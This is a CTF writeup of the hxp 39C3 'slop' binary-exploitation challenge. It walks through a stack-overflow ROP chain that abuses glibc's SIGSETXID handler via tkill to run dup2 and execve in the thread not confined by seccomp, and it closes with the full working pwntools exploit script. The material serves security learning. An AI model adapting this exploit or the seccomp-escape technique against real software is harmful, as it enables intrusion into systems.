hxp 39C3 CTF: slop writeup
Although I did not attend 39C3, I played the hxp CTF for a bit with the
justCatTheFish team. I focused on the slop pwn challenge,
which we did not manage to finish in time, although we came close. I thought the
challenge was very cool, so I decided to finish it and post this writeup.
The challenge files can be downloaded here. It’s a Linux user-space binary exploitation challenge. The binary is statically linked with the following mitigations:
$ pwn checksec ./slop
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
Stripped: No
Among the relevant files, we also get the source code (slop.c), a readflag
binary, and a Dockerfile. Because of how the permissions are set up in the
Dockerfile, we can’t read /flag.txt directly and have to run the
/readflag program, which has the setgid bit set and prints the flag to stdout.
How does slop work?
The program listens on a TCP socket and handles the connection in another thread. This is what happens at a high level. First, the main thread:
1. A TCP socket is created and listens on port 1234, waiting for one connection. After a client connects, execution continues to point 2.
2. The random_memory function is called, which allocates a new stack at a randomized address. The new stack is not effective yet, just allocated. I’m not sure why this is in the challenge. As it turns out, it’s not required to leak this address or explicitly use the new stack.
3. A new connection thread is started with handle_request as the entrypoint.
4. Finally, the stack is switched to the address from point 2 and the program goes into a tight infinite loop calling sched_yield repeatedly.
The connection thread does this:
- Reads 0x300 bytes from the socket straight into the thread’s stack. This conveniently lands almost right at the return address (__builtin_frame_address(0)) and no canary leak is needed.
- Installs a seccomp policy allowing only these syscalls: pause, nanosleep, alarm, getpid, exit, wait4, kill, getcwd, sysinfo, tkill, exit_group, waitid. Any other syscall called from this thread terminates the program.
- If the return address is not overwritten, handle_request returns to pthreads (start_thread) and crashes due to calling the rt_sigprocmask syscall, which is not allowed.
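To keep track of what the connection thread may and may not do, it helps to write the policy down as data. The following is a minimal sketch, not the challenge's actual filter: the numbers are the standard x86-64 syscall numbers, and the helper name allowed_in_connection_thread is made up for illustration.

```python
# x86-64 syscall numbers for the syscalls the seccomp policy allows.
ALLOWED = {
    "pause": 34, "nanosleep": 35, "alarm": 37, "getpid": 39,
    "exit": 60, "wait4": 61, "kill": 62, "getcwd": 79,
    "sysinfo": 99, "tkill": 200, "exit_group": 231, "waitid": 247,
}

# Other syscalls that come up in this writeup (all blocked in the thread).
OTHER = {
    "rt_sigaction": 13, "rt_sigprocmask": 14, "sched_yield": 24,
    "dup2": 33, "execve": 59,
}


def allowed_in_connection_thread(name):
    """Return True if the policy described above permits syscall `name`."""
    return name in ALLOWED


if __name__ == "__main__":
    for name in ("getpid", "tkill", "nanosleep", "pause",
                 "dup2", "execve", "rt_sigprocmask"):
        verdict = "allowed" if allowed_in_connection_thread(name) else "terminates the program"
        print(f"{name:15} {verdict}")
```

Everything the exploit eventually needs from the connection thread (getpid, tkill, nanosleep, pause) is on the allowed side, while dup2 and execve are not.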
From this behavior, we can deduce that we first need to take over the execution
of the connection thread with a ROP chain (there is a generous 0x300 bytes
budget) and from there somehow take over the execution of the main thread,
which is not sandboxed by seccomp. Then, we call the /readflag binary so that
it outputs the flag to the socket. There are two issues here:
1. The main thread is stuck in this loop:
   0x401a5d <main+269> mov eax, 0x18
   0x401a62 <main+274> syscall <SYS_sched_yield>
   0x401a64 <main+276> jmp main+269
   Even with full control over the memory from the connection thread’s ROP, we can’t break the loop. There needs to be another way of triggering execution in the main thread.
2. Simply calling execve on /readflag will print the flag to stdout on the server and not to our connection. We need a way to redirect stdout to the socket.
For the first issue, a natural solution is to trigger a signal handler which would run asynchronously in the context of the main thread. We can manipulate the memory it operates on from the connection thread and hopefully take over the execution.
For the second one, we need to call the dup2 syscall, but it is blocked by the
seccomp policy in the connection thread, so it also requires code execution in
the main thread. Let’s take a look at signals first.
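The redirection idea itself is easy to try outside the challenge. Here is a small sketch, assuming a Linux host: it forks only so that the demo script survives the exec (the exploit instead calls dup2 and execve directly in the main thread), and the function name run_with_stdout_on_socket is hypothetical.

```python
import os
import socket
import sys


def run_with_stdout_on_socket(argv):
    """Run argv with fd 1 pointing at a socket and return what it printed."""
    ours, theirs = socket.socketpair()
    pid = os.fork()
    if pid == 0:
        # Child: make fd 1 refer to the socket, then replace the process image.
        try:
            os.dup2(theirs.fileno(), 1)
            os.execvp(argv[0], argv)
        finally:
            os._exit(127)  # only reached if dup2 or exec failed
    theirs.close()
    chunks = []
    while True:
        data = ours.recv(4096)
        if not data:  # EOF: the child exited and closed its end
            break
        chunks.append(data)
    ours.close()
    os.waitpid(pid, 0)
    return b"".join(chunks)


if __name__ == "__main__":
    print(run_with_stdout_on_socket([sys.executable, "-c", "print('flag goes here')"]))
```

The program being executed does nothing special; it writes to its stdout as usual and the bytes arrive on the other end of the socket.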
Finding a signal handler
The program doesn’t explicitly register any signal handlers and the seccomp
policy doesn’t allow that. This means we can’t simply register a handler and
then trigger its execution in the main thread. We need to find an already
registered signal handler and trigger it with one of the allowed syscalls.
Now, how to discover the signals handled by a process? We found the right
signal by trial and error, but we unfortunately lost a lot of time here. Only
after the CTF did I realise that, unless the handler is somehow magically set up
by the kernel, it has to show up in strace. And indeed, the handler is
registered with rt_sigaction when the connection thread is spawned:
$ strace -e t='/.*sig.*' ./slop
--- SIGWINCH {si_signo=SIGWINCH, si_code=SI_KERNEL} ---
rt_sigaction(SIGRT_1, {sa_handler=0x42e9f0, sa_mask=[], sa_flags=SA_RESTORER|SA_ONSTACK|SA_RESTART|SA_SIGINFO, sa_restorer=0x41fc60}, NULL, 8) = 0
rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0
rt_sigprocmask(SIG_BLOCK, ~[], [], 8) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
This action is registered by the pthreads library with signal
number 33 (SIGRT_1 aka SIGSETXID) and the handler function
__nptl_setxid_sighandler (0x42e9f0). For this
challenge, it is not necessary to know what it is legitimately used for, but it
runs code that is perfect for our exploitation:
/* Set by __nptl_setxid and used by __nptl_setxid_sighandler. */
static struct xid_command *xidcmd;

/* We use the SIGSETXID signal in the setuid, setgid, etc. implementations to
   tell each thread to call the respective setxid syscall on itself. This is
   the handler. */
void
__nptl_setxid_sighandler (int sig, siginfo_t *si, void *ctx)
{
  int result;

  /* Safety check. It would be possible to call this function for
     other signals and send a signal from another process. This is not
     correct and might even be a security problem. Try to catch as
     many incorrect invocations as possible. */
  if (sig != SIGSETXID
      || si->si_pid != __getpid ()
      || si->si_code != SI_TKILL)
    return;

  result = INTERNAL_SYSCALL_NCS (xidcmd->syscall_no, 3, xidcmd->id[0],
                                 xidcmd->id[1], xidcmd->id[2]);
  int error = 0;
  if (__glibc_unlikely (INTERNAL_SYSCALL_ERROR_P (result)))
    error = INTERNAL_SYSCALL_ERRNO (result);
  setxid_error (xidcmd, error);
  ...
}
This essentially means that we can call an arbitrary syscall by overwriting the
xidcmd pointer to point at a crafted xid_command structure before triggering the
handler. Here is what it looks like in the challenge:
0x42ea23 <__nptl_setxid_sighandler+51> mov rax, qword ptr [rip + 0x97746] RAX, [xidcmd]
0x42ea2a <__nptl_setxid_sighandler+58> mov rsi, qword ptr [rax + 0x10]
0x42ea2e <__nptl_setxid_sighandler+62> mov rdi, qword ptr [rax + 8]
0x42ea32 <__nptl_setxid_sighandler+66> mov rdx, qword ptr [rax + 0x18]
0x42ea36 <__nptl_setxid_sighandler+70> mov eax, dword ptr [rax]
0x42ea38 <__nptl_setxid_sighandler+72> syscall
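The disassembly gives both the location of the xidcmd pointer and the field offsets the handler reads. Below is a rough sketch of that arithmetic and of packing a fake structure with the struct module. The two trailing int fields (a counter at 0x20 and error at 0x24) are an assumption based on glibc's struct xid_command, and fake_xid_command is a hypothetical helper name.

```python
import struct

# A rip-relative operand is relative to the address of the *next* instruction.
NEXT_INSN = 0x42ea2a       # instruction following the load at 0x42ea23
DISPLACEMENT = 0x97746     # from `[rip + 0x97746]`
XIDCMD_PTR = NEXT_INSN + DISPLACEMENT

# Layout read by the handler: int at +0, three 8-byte values at +8, +0x10, +0x18.
# Assumed tail: int cntr at +0x20, int error at +0x24.
XID_COMMAND = struct.Struct("<i4xQQQii")


def fake_xid_command(syscall_no, a0=0, a1=0, a2=0, cntr=0, error=0):
    """Pack a fake xid_command describing syscall_no(a0, a1, a2)."""
    return XID_COMMAND.pack(syscall_no, a0, a1, a2, cntr, error)


if __name__ == "__main__":
    print(hex(XIDCMD_PTR))                 # 0x4c6170
    blob = fake_xid_command(33, 4, 1)      # dup2(4, 1); 33 is SYS_dup2 on x86-64
    print(len(blob), blob.hex())
```

The computed address should match what the binary's symbol table reports for xidcmd, which is a quick sanity check before building the chain.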
The handler performs some prior safety checks, but we satisfy all of them:
- Signal number is SIGSETXID (33) - this is always true.
- Sent from the same PID - both threads share the same PID.
- Sent from the tkill syscall - allowed by seccomp.
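The three checks can be modelled as a simple predicate. This is only a sketch of the condition in the handler source above, with the Linux si_code constants filled in (SI_USER is 0, SI_TKILL is -6); handler_accepts is a made-up name.

```python
SIGSETXID = 33   # SIGRT_1 in the strace output
SI_USER = 0      # si_code of a signal sent with kill()
SI_TKILL = -6    # si_code of a signal sent with tkill()/tgkill()


def handler_accepts(sig, si_pid, si_code, own_pid):
    """Mirror the safety check at the top of __nptl_setxid_sighandler."""
    return sig == SIGSETXID and si_pid == own_pid and si_code == SI_TKILL


if __name__ == "__main__":
    pid = 1337  # arbitrary example PID
    print(handler_accepts(33, pid, SI_TKILL, pid))  # sent with tkill from the same process
    print(handler_accepts(33, pid, SI_USER, pid))   # sent with kill from the same process
```

This also shows why tkill matters even though kill is on the seccomp allow list: a signal sent with kill carries SI_USER and the handler would return early.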
Gracefully returning from the handler allows us to make multiple syscalls. We
need to make sure xidcmd->error is set to 0, otherwise
setxid_error will abort the program.
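To see why the stored error value matters, here is a rough Python model of the check. It is based on my reading of glibc's setxid_error and should be treated as an assumption rather than a faithful port: the stored value must either equal the new result or still be the initial -1, otherwise the process aborts.

```python
class Aborted(Exception):
    """Stands in for glibc calling abort()."""


def setxid_error(stored_error, syscall_error):
    """Return the new stored error, or raise Aborted on a mismatch."""
    if stored_error == syscall_error:
        return stored_error          # same outcome as before, nothing to do
    if stored_error != -1:
        raise Aborted(f"stored {stored_error}, got {syscall_error}")
    return syscall_error             # first result seen, remember it


if __name__ == "__main__":
    print(setxid_error(0, 0))        # successful syscall, error field zeroed
    try:
        setxid_error(0x41414141, 0)  # leftover garbage in the error field
    except Aborted as exc:
        print("abort:", exc)
```

Since the syscalls we trigger are expected to succeed (error 0), zeroing the field in the fake structure keeps the handler on the non-aborting path.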
Full exploit
We have all the required pieces to construct the exploit. The ROP chain has to:
1. Overwrite the xidcmd pointer.
2. Set up a fake xid_command structure to call dup2(4, 1) and call tkill to trigger it in the main thread.
3. Call nanosleep to make sure the previous step finished.
4. Set up a fake xid_command structure to call execve("/readflag", 0, 0) and call tkill to trigger it in the main thread.
5. Call pause so the program doesn’t crash.
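Each of these steps is built from 8-byte memory writes, so it is worth checking how much of the 0x300-byte budget a write costs. The sketch below uses only the standard library to mimic what nested lists passed to pwntools' flat end up as; the gadget addresses are the ones from the exploit code further down, while flatten and pack_chain are illustrative helper names.

```python
import struct

BUDGET = 0x300  # bytes read from the socket into the thread's stack

POP_RAX = 0x4051bf
POP_RSI = 0x405caf
MOV_MEM_RSI_RAX = 0x417f21  # mov qword ptr [rsi], rax; ret


def write_mem(where, what):
    """Chain fragment that stores the 8-byte value `what` at address `where`."""
    return [POP_RSI, where, POP_RAX, what, MOV_MEM_RSI_RAX]


def flatten(items):
    """Flatten arbitrarily nested lists into one list of integers."""
    out = []
    for item in items:
        if isinstance(item, list):
            out.extend(flatten(item))
        else:
            out.append(item)
    return out


def pack_chain(items):
    """Pack every entry as a little-endian 64-bit value."""
    return b"".join(struct.pack("<Q", value) for value in flatten(items))


if __name__ == "__main__":
    one_write = pack_chain([write_mem(0x4c1000, 33)])
    print(len(one_write), "bytes per write,", BUDGET // len(one_write), "writes fit in the budget")
```

At 40 bytes per write, the budget is comfortable but not unlimited, which is why the exploit reuses a single fake structure for both triggered syscalls.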
As a side note, to move the return value of getpid from eax into edi for tkill, I used an xchg edi, eax gadget. I couldn’t find this gadget with ropper and pwntools, weird:
$ ROPgadget --binary ./slop | grep 'xchg edi'
0x000000000047a8c6 : xchg edi, eax ; ret
And finally, here is the full exploit code:
#!/usr/bin/env python3
from pwn import *

exe = context.binary = ELF(args.EXE or './slop')

def start(argv=[], *a, **kw):
    port = 1024
    if args.REMOTE:
        return remote(args.HOST or 'localhost', port, *a, **kw)
    else:
        gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
        sleep(1)
        return remote('localhost', port, *a, **kw)

gdbscript = '''
continue
'''.format(**locals())

# ROP gadgets
pop_rax_ret = 0x4051bf
pop_rdi_ret = 0x402701
pop_rsi_ret = 0x405caf
mov_mem_rsi_rax_ret = 0x417f21  # mov qword ptr [rsi], rax; ret;
syscall_ret = 0x405972
xchg_edi_eax_ret = 0x47a8c6

# writable memory, nothing important there
fake_xidcmd = 0x4c1000
execve_path = fake_xidcmd + 0x100

def write_mem(where, what):
    return [
        pop_rsi_ret, where,
        pop_rax_ret, what,
        mov_mem_rsi_rax_ret
    ]

def syscall(syscall_nr, rdi=None, rsi=None):
    return [
        pop_rax_ret, syscall_nr,
        [pop_rdi_ret, rdi] if rdi else [],
        [pop_rsi_ret, rsi] if rsi else [],
        syscall_ret
    ]

def tkill(syscall_nr, rdi, rsi, rdx=None):
    return [
        write_mem(fake_xidcmd, syscall_nr),  # rax
        write_mem(fake_xidcmd+0x8, rdi),
        write_mem(fake_xidcmd+0x10, rsi),
        write_mem(fake_xidcmd+0x18, rdx) if rdx else [],
        write_mem(fake_xidcmd+0x24, 0),  # xidcmd->error has to be 0
        exe.sym['getpid'],  # we can just call getpid from libc
        xchg_edi_eax_ret,
        syscall(constants.SYS_tkill,
                None,  # rdi already set with xchg
                33)    # SIGRT_1
    ]

rop = flat([
    # 1
    write_mem(exe.sym['xidcmd'], fake_xidcmd),
    # 2
    tkill(constants.SYS_dup2, 4, 1),
    # 3
    syscall(constants.SYS_nanosleep,
            0x4bf128,  # fake timespec - 1s wait
            0),
    # 4
    write_mem(execve_path, u64(b'/readfla')),
    write_mem(execve_path+8, u64(b'g'+b'\x00'*7)),
    tkill(constants.SYS_execve, execve_path, 0, 0),
    # 5
    syscall(constants.SYS_pause)
])

io = start()
io.recvuntil(b'send me your slop:\n')
io.send(b'A'*8 + rop)
io.interactive()